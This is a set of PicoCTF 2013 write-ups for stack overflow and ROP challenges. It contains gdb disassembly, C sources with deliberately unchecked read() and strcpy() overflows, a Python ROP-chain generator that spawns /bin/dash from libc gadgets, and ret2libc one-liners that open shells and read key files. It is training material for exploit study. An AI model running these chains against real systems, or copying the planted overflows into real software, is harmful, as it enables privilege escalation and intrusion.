
# PicoCTF 2k13 - Overflow 5


$ gdb buffer_overflow_shellcode_hard
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x080483c0 <+0>: push   ebp
   0x080483c1 <+1>: mov    ebp,esp
   0x080483c3 <+3>: and    esp,0xfffffff0
   0x080483c6 <+6>: sub    esp,0x10
   0x080483c9 <+9>: cmp    DWORD PTR [ebp+0x8],0x2
   0x080483cd <+13>: je     0x80483e2 <main+34>
   0x080483cf <+15>: mov    DWORD PTR [esp],0x80485c0
   0x080483d6 <+22>: call   0x8048390 <puts@plt>
   0x080483db <+27>: mov    eax,0x1
   0x080483e0 <+32>: leave  
   0x080483e1 <+33>: ret    
   0x080483e2 <+34>: call   0x8048370 <geteuid@plt>
   0x080483e7 <+39>: mov    DWORD PTR [esp+0x8],eax
   0x080483eb <+43>: mov    DWORD PTR [esp+0x4],eax
   0x080483ef <+47>: mov    DWORD PTR [esp],eax
   0x080483f2 <+50>: call   0x8048360 <setresuid@plt>
   0x080483f7 <+55>: mov    eax,DWORD PTR [ebp+0xc]
   0x080483fa <+58>: mov    eax,DWORD PTR [eax+0x4]
   0x080483fd <+61>: mov    DWORD PTR [esp],eax
   0x08048400 <+64>: call   0x80484c0 <vuln>
   0x08048405 <+69>: xor    eax,eax
   0x08048407 <+71>: leave  
   0x08048408 <+72>: ret    
End of assembler dump.
(gdb) disassemble vuln
Dump of assembler code for function vuln:
   0x080484c0 <+0>: sub    esp,0x41c
   0x080484c6 <+6>: mov    eax,DWORD PTR [esp+0x420]
   0x080484cd <+13>: mov    DWORD PTR [esp+0x4],eax
   0x080484d1 <+17>: lea    eax,[esp+0x10]
   0x080484d5 <+21>: mov    DWORD PTR [esp],eax
   0x080484d8 <+24>: call   0x8048380 <strcpy@plt>
   0x080484dd <+29>: add    esp,0x41c
   0x080484e3 <+35>: ret    
End of assembler dump.
(gdb) break main
(gdb) run
(gdb) info proc mappings 
process 21137
Mapped address spaces:

 Start Addr   End Addr       Size     Offset objfile
  0x8048000  0x8049000     0x1000        0x0 /problems/stack_overflow_5_0353c1a83cb2fa0d/buffer_overflow_shellcode_hard
  0x8049000  0x804a000     0x1000        0x0 /problems/stack_overflow_5_0353c1a83cb2fa0d/buffer_overflow_shellcode_hard
  0x804a000  0x804b000     0x1000     0x1000 /problems/stack_overflow_5_0353c1a83cb2fa0d/buffer_overflow_shellcode_hard
 0xf7e28000 0xf7e29000     0x1000        0x0 
 0xf7e29000 0xf7fca000   0x1a1000        0x0 /lib32/libc-2.15.so
 0xf7fca000 0xf7fcc000     0x2000   0x1a1000 /lib32/libc-2.15.so
 0xf7fcc000 0xf7fcd000     0x1000   0x1a3000 /lib32/libc-2.15.so
 0xf7fcd000 0xf7fd1000     0x4000        0x0 
 0xf7fda000 0xf7fdb000     0x1000        0x0 
 0xf7fdb000 0xf7fdc000     0x1000        0x0 [vdso]
 0xf7fdc000 0xf7ffc000    0x20000        0x0 /lib32/ld-2.15.so
 0xf7ffc000 0xf7ffd000     0x1000    0x1f000 /lib32/ld-2.15.so
 0xf7ffd000 0xf7ffe000     0x1000    0x20000 /lib32/ld-2.15.so
 0xfffdd000 0xffffe000    0x21000        0x0 [stack]
$ ./ROPgadget /lib32/libc-2.15.so /bin/dash 2>&1 | grep -A 1000 python | sed -e "s/p = ''/p = '\\\x90'*1036/" -e 's/off = 0x0/off = 0xf7e29000/' > ~/rop.py
# cat ~/rop.py 
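#!/usr/bin/python
# execve("/bin/dash", [], []) ROP chain for PicoCTF 2k13 "Overflow 5".
#
# The gadget offsets come from ROPgadget v4.0.4 run against /lib32/libc-2.15.so
# (see the generating command above); the emitted chain has been restructured
# into helpers so the repeated write-what-where pattern is visible instead of
# spelled out dword by dword.  All offsets are relative to the libc load
# address.
#
# Delivery constraints the chain must respect (checked before it is emitted):
#   * it travels as argv[1] and is copied by strcpy(), so it must not contain a
#     NUL byte anywhere;
#   * vuln() keeps its buffer at esp+0x10 and its return address at esp+0x41c,
#     so the saved return address is 0x40c = 1036 bytes past the buffer start.
#
# NOTE(review): the libc base 0xf7e29000 was read from `info proc mappings`
# inside gdb and reused for the real run outside gdb.  That only holds while
# the target has ASLR disabled -- confirm the mapping on the box before
# relying on it.
import sys
from struct import pack

LIBC_BASE = 0xf7e29000      # start of /lib32/libc-2.15.so in the target process
RET_OFFSET = 1036           # bytes from the start of vuln()'s buffer to saved EIP
SYS_EXECVE = 11             # i386 syscall number for execve

# Gadget offsets inside libc-2.15.so (as reported by ROPgadget).
POP_EDX_ECX_EAX = 0x000f35df  # pop edx ; pop ecx ; pop eax ; ret
POP_EAX         = 0x00023f78  # pop eax ; ret
MOV_ECX_EAX     = 0x0007416a  # mov DWORD PTR [ecx],eax ; ret
XOR_EAX         = 0x00032e30  # xor eax,eax ; ret
POP_EBX         = 0x000192ee  # pop ebx ; ret
POP_EDX         = 0x00001a9e  # pop edx ; ret
INC_EAX         = 0x000082ac  # inc eax ; ret
INT_0x80        = 0x0002e2f5  # int 0x80
DATA            = 0x001a3ee0  # writable scratch space in libc's .data

JUNK = b"AAAA"                 # filler for pops whose value does not matter


def gadget(base, offset):
    """Little-endian absolute address of the gadget at `offset` from `base`."""
    return pack("<I", base + offset)


def store_dword(base, addr_offset, value):
    """Chain fragment that writes the 4-byte string `value` to base+addr_offset.

    The triple-pop gadget loads the destination into ecx, `pop eax` loads the
    value, and `mov [ecx],eax` commits it.
    """
    return (gadget(base, POP_EDX_ECX_EAX) + JUNK + gadget(base, addr_offset) + JUNK
            + gadget(base, POP_EAX) + value
            + gadget(base, MOV_ECX_EAX))


def store_zero(base, addr_offset):
    """Chain fragment that writes a zero dword to base+addr_offset.

    Like store_dword(), but eax is cleared with `xor eax,eax` so the zero never
    has to appear literally (and fatally) in the payload.
    """
    return (gadget(base, POP_EDX_ECX_EAX) + JUNK + gadget(base, addr_offset) + JUNK
            + gadget(base, XOR_EAX)
            + gadget(base, MOV_ECX_EAX))


def build_payload(base=LIBC_BASE, ret_offset=RET_OFFSET):
    """Return the complete argv[1] payload: NOP padding followed by the chain.

    base       -- load address of libc in the target process
    ret_offset -- distance from the overflowed buffer to the saved return address

    The chain writes "/bin/dash\\0" into libc's .data, then sets
    ebx=filename, ecx=argv and edx=envp (both pointing at the zero dword, i.e.
    empty arrays), eax=SYS_EXECVE, and traps into the kernel.

    Raises ValueError if the result contains a NUL byte, because strcpy() and
    the argv boundary would both truncate it there.
    """
    chain = b"\x90" * ret_offset

    # Program name, four bytes at a time, then its terminator.
    chain += store_dword(base, DATA, b"/bin")
    chain += store_dword(base, DATA + 4, b"/das")
    chain += store_dword(base, DATA + 8, b"hAAA")   # the "AAA" is overwritten below
    chain += store_zero(base, DATA + 9)

    # execve(ebx="/bin/dash", ecx=&NULL, edx=&NULL)
    chain += gadget(base, POP_EBX) + gadget(base, DATA)
    chain += gadget(base, POP_EDX_ECX_EAX) + JUNK + gadget(base, DATA + 9) + JUNK
    chain += gadget(base, POP_EDX) + gadget(base, DATA + 9)
    chain += gadget(base, XOR_EAX) + gadget(base, INC_EAX) * SYS_EXECVE
    chain += gadget(base, INT_0x80)

    if b"\x00" in chain:
        raise ValueError("payload contains a NUL byte; strcpy()/argv would truncate it")
    return chain


if __name__ == "__main__":
    payload = build_payload()
    # Emit raw bytes plus the trailing newline that `print` used to add;
    # works under Python 2 (no .buffer) and Python 3.
    out = getattr(sys.stdout, "buffer", sys.stdout)
    out.write(payload + b"\n")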
$ ./buffer_overflow_shellcode_hard `python ~/rop.py`
$ cat key
most_impressive_young_padawan

# PicoCTF 2k13 - ROP 4


$ cat /problems/ROP_4_887f7f28b1f64d7e/rop4.c
#include <stdio.h>
#include <unistd.h>
#include <string.h>

char exec_string[20];

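// Exec whatever name currently sits in exec_string, with argv = { exec_string }.
// execlp() consults PATH when the name has no slash and only returns on
// failure, which this function does not report.  The variadic argument list
// must end in a null *pointer*; a bare NULL may expand to the int 0, which is
// not guaranteed to be read back correctly as a char* through the varargs
// mechanism, so it is cast explicitly here.
void exec_the_string() {
 execlp(exec_string, exec_string, (char *)NULL);
}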

// ROP target: stores "/sh" into exec_string, but only when invoked with the
// magic argument 0xcafebabe.  The constant does not fit in an int, so the
// comparison is carried out in unsigned arithmetic; spelling that out keeps
// the intent (and the compiler's sign-compare warning) visible.
void call_me_with_cafebabe(int cafebabe) {
 const unsigned int magic = 0xcafebabeu;
 if ((unsigned int)cafebabe != magic) {
  return;
 }
 strcpy(exec_string, "/sh");
}

// ROP target: stores "/bin" into exec_string when both magic arguments match.
// Both comparisons are done in unsigned arithmetic because neither constant
// fits in an int.  Checked in the same order as before (cafebabe first).
void call_me_with_two_args(int deadbeef, int cafebabe) {
 const int both_match = ((unsigned int)cafebabe == 0xcafebabeu)
                     && ((unsigned int)deadbeef == 0xdeadbeefu);
 if (both_match) {
  strcpy(exec_string, "/bin");
 }
}

// The bug.  buf holds 128 bytes but read() is allowed to deliver up to 512, so
// stdin can overwrite the saved frame pointer and return address (the writeup's
// payload places the new return address 140 bytes in).  Because read() copies
// raw bytes, the payload may contain NUL bytes -- unlike a strcpy() overflow.
// The byte count is ignored and buf is never used afterwards.  Deliberately
// left as-is: this function *is* the challenge, not code to harden.
void vulnerable_function() {
 char buf[128];
 read(STDIN_FILENO, buf, 512);
}

// Keep the elevated group across a later shell.  /bin/sh is usually bash,
// which (as the challenge authors note) drops an effective gid that differs
// from the real one; setting real, effective and saved gids all to the
// current effective gid leaves nothing for it to drop.  Only the gid is
// handled -- presumably the key is group-readable.  The return value is
// ignored, as in the original.
void be_nice_to_people() {
 const gid_t egid = getegid();
 (void)setresgid(egid, egid, egid);
}

// Entry point: clear the exec target, preserve the effective gid, then hand
// stdin to the overflowable reader.  argc/argv are unused; the function falls
// off its end exactly as the original does.
int main(int argc, char** argv) {
 (void)argc;
 (void)argv;
 exec_string[0] = '\0';
 be_nice_to_people();
 vulnerable_function();
}
$ ln -s /problems/ROP_4_887f7f28b1f64d7e/rop4 rop4
$ ./getenvaddr SHELL ./rop4
SHELL will be at 0xffffd881
$ objdump -t rop4 | grep execlp
08053ab0 g     F .text 0000012a execlp
$ (python -c 'print "\x90"*140 + "\xb0\x3a\x05\x08" + "\x87\xd8\xff\xff"*2 + "\x00"*4'; cat) | ./rop4
cat /problems/ROP_4_887f7f28b1f64d7e/key
fluent_in_roponese

# PicoCTF 2k13 - ROP 3


$ cat /problems/ROP_3_7f3312fe43c46d26/rop3.c 
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// The bug.  buf holds 128 bytes but read() may deliver 256, so stdin overwrites
// the saved frame pointer and return address (the writeup's payload puts the
// new return address 140 bytes in, followed by a fake frame for system()).
// read() copies raw bytes, so NUL bytes in the payload are fine, unlike a
// strcpy() overflow.  The byte count is ignored and buf is never used again.
// Intentionally left vulnerable -- this function is the challenge.
void vulnerable_function()  {
 char buf[128];
 read(STDIN_FILENO, buf,256);
}

// Keep the elevated group across a later shell.  /bin/sh is usually bash,
// which (as the challenge authors note) drops an effective gid that differs
// from the real one; making real, effective and saved gids all equal to the
// current effective gid leaves nothing for it to drop.  Only the gid is
// handled -- presumably the key is group-readable.  The return value is
// ignored, as in the original.
void be_nice_to_people() {
 const gid_t egid = getegid();
 (void)setresgid(egid, egid, egid);
}

// Entry point: preserve the effective gid, read (and overflow) from stdin,
// then print a banner.  The banner write is unchecked, as before, and the
// function falls off its end exactly as the original does.  argc/argv unused.
int main(int argc, char** argv) {
        static const char banner[] = "Hello, World\n";
        (void)argc;
        (void)argv;
        be_nice_to_people();
        vulnerable_function();
        write(STDOUT_FILENO, banner, sizeof banner - 1);
}
$ export | grep SHELL
export SHELL="/bin/sh"
$ ln -s /problems/ROP_3_7f3312fe43c46d26/rop3 rop3
$ ./getenvaddr SHELL ./rop3
SHELL will be at 0xffffd881
$ gdb rop3
(gdb) break main
(gdb) run
(gdb) print system
$1 = {<text variable, no debug info>} 0xf7e68250 <system>
(gdb) print exit
$2 = {<text variable, no debug info>} 0xf7e5bf30 <exit>
$ (python -c 'print "\x90"*140 + "\x50\x82\xe6\xf7" + "\x30\xbf\xe5\xf7" + "\x87\xd8\xff\xff"'; cat) | ./rop3
cat /problems/ROP_3_7f3312fe43c46d26/key
rop_rop_rop_all_the_way_home

# PicoCTF 2k13 - ROP 2


$ cat rop2.c 
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char * not_used = "/bin/bash";

// Never called, but its body compiles to `mov [esp],<"/bin/date">; call system`
// (see the gdb dump below).  The writeup returns into the `call` at
// not_called+13 (0x080484b1), so the next dword on the overflowed stack is
// what system() sees as its argument: the "/bin/bash" pointer from not_used.
// Leave the body exactly as-is; the gadget offset depends on this code.
int not_called() {
 return system("/bin/date");
}

// The bug.  buf holds 128 bytes but read() may deliver 256, so stdin overwrites
// the saved frame pointer and return address (the writeup's payload puts the
// new return address 140 bytes in, followed by the argument for system()).
// read() copies raw bytes, so NUL bytes in the payload are fine.  The byte
// count is ignored and buf is never used again.  Intentionally left
// vulnerable -- this function is the challenge.
void vulnerable_function() {
 char buf[128];
 read(STDIN_FILENO, buf, 256);
}

// Keep the elevated group across a later shell.  /bin/sh is usually bash,
// which (as the challenge authors note) drops an effective gid that differs
// from the real one; setting real, effective and saved gids all to the
// current effective gid leaves nothing for it to drop.  Only the gid is
// handled -- presumably the key is group-readable.  The return value is
// ignored, as in the original.
void be_nice_to_people() {
 const gid_t egid = getegid();
 (void)setresgid(egid, egid, egid);
}

// Entry point: preserve the effective gid, read (and overflow) from stdin,
// then print a banner.  The banner write is unchecked, as before, and the
// function falls off its end exactly as the original does.  argc/argv unused.
int main(int argc, char** argv) {
        static const char banner[] = "Hello, World\n";
        (void)argc;
        (void)argv;
        be_nice_to_people();
        vulnerable_function();
        write(STDOUT_FILENO, banner, sizeof banner - 1);
}
$ objdump -t ./rop2 | grep not_
080484a4 g     F .text 00000014              not_called
0804a024 g     O .data 00000004              not_used
$ gdb ./rop2
(gdb) set disassembly-flavor intel
(gdb) x/7i 0x080484a4
   0x80484a4 : push   ebp
   0x80484a5 : mov    ebp,esp
   0x80484a7 : sub    esp,0x18
   0x80484aa : mov    DWORD PTR [esp],0x804861a
   0x80484b1 : call   0x80483a0 
   0x80484b6 : leave  
   0x80484b7 : ret
(gdb) x/xw 0x0804a024
0x804a024 : 0x08048610
$ (python -c 'print "\x90"*140 + "\xb1\x84\x04\x08" + "\x10\x86\x04\x08"'; cat) | ./rop2
cat key
i_could_get_used_to_this_rop_thing

# PicoCTF 2k13 - ROP 1


$ cat rop1.c
#undef _FORTIFY_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// Never called by the program; it exists so there is a ready-made
// system("/bin/bash") for a return address to land on (the writeup returns
// to its first instruction, 0x080484a4).  Returns system()'s status.
int not_called() {
        const int status = system("/bin/bash");
        return status;
}

// The bug.  buf holds 128 bytes but read() may deliver 256, so stdin overwrites
// the saved frame pointer and return address (the writeup's payload puts the
// address of not_called() 140 bytes in).  read() copies raw bytes, so NUL
// bytes in the payload are fine.  The byte count is ignored and buf is never
// used again.  Intentionally left vulnerable -- this function is the challenge.
void vulnerable_function() {
        char buf[128];
        read(STDIN_FILENO, buf, 256);
}

// Keep the elevated group across a later shell.  /bin/sh is usually bash,
// which (as the challenge authors note) drops an effective gid that differs
// from the real one; making real, effective and saved gids all equal to the
// current effective gid leaves nothing for it to drop.  Only the gid is
// handled -- presumably the key is group-readable.  The return value is
// ignored, as in the original.
void be_nice_to_people() {
        const gid_t egid = getegid();
        (void)setresgid(egid, egid, egid);
}

// Entry point: preserve the effective gid, read (and overflow) from stdin,
// then print a banner.  The banner write is unchecked, as before, and the
// function falls off its end exactly as the original does.  argc/argv unused.
int main(int argc, char** argv) {
        static const char banner[] = "Hello, World\n";
        (void)argc;
        (void)argv;
        be_nice_to_people();
        vulnerable_function();
        write(STDOUT_FILENO, banner, sizeof banner - 1);
}
$ (python -c 'print "\x90"*140 + "\xa4\x84\x04\x08"'; cat) | ./rop1
cat key
rops_on_rops_on_rops